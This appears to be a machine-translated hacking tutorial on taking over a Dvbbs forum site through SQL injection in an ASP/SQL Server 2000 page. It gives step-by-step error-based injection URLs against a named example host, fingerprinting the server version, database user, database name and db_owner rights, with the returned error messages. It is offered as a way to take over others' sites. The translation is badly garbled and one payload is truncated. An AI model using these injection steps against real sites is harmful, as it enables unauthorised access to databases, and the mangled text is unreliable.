Now the latest version of the mobile network is 7.0 SP2. It should be said that safety is already very high. So from the script itself to break through it. It is difficult to do. But we can indirect "to" to "moving network from some ways. Now the combination of IIS ASP SQL2000 is more common. And a website uses a lot of ASP script, which is inevitably not leaking. If there is a SQL injection point on a host, this host is equipped with a moving network SQL version, basically can be concluded: this network is yours. Let's take a look at the example.
First, first determine the goal
Suppose the following URL is in SQL injection:
Http://www.loveyou.com/type.asp?id=6 Test can be injected to add a single quotation number after 6. http://www.loveyou.com/type.aspid=6 'Return Error Tips: Microsoft OLE DB Provider for ODBC Drivers Error' 80040E14 '[Microsoft] [ODBC SQL Server Driver] [SQL Server] String' Unclosed quotes.
Continue, first detect the system version:
http://www.loveyou.com/Type.asp?id= (SELECT @@ Version) -
return:
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] NVARCHAR VAT 2000 - 8.00.760 (Intel x86) DEC 17 2002 14:22:05 CopyRight ( C) 1988-2003 Microsoft Corporation Standard Edition ON Windows NT 5.0 (Build 2195: Service Pack 4) 'When converted to a column of data types for int, the syntax error occurs.
It seems that the latest SP4 patch has been placed.
Get the current connection database user:
http://www.loveyou.com/type.asp?id= (SELECT User_name ()) -
return:
Microsoft OLE DB Provider for ODBC Drivers Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Convert NVARCHAR Value 'WebUser' When the data type is a column of the data type INT, a syntax error occurs.
Get the current database users from the error message: Webuser
Get the current connection database name:
http://www.loveyou.com/type.asp?id= (SELECT DB_NAME ()) -
return:
Microsoft OLE DB Provider for ODBC DRIVERS Error '80040E07' [Microsoft] [ODBC SQL Server Driver] [SQL Server] Converts nVarChar Value '01city' When the syntax error occurs when the data type Int is int.
Get the current database from the error message: 01city
Next, the permissions are tested: (Note: Because our purpose is to get the network instead of the system. Therefore, database permissions are not very important to us.)
http://www.loveyou.com/type.asp?id= (SySADMIN ')) -
Returns the error message. Tip The current record has been deleted. It seems that the permissions are not very high. Continue, http://www.loveyou.com/type.asp? Id = (SELECT% 20IS_MEMBER ('db_owner'))
Normal display information, it seems that the permissions owned by the connection database are DB_OWNER (Down database owner. But the manipulation data is more than enough.
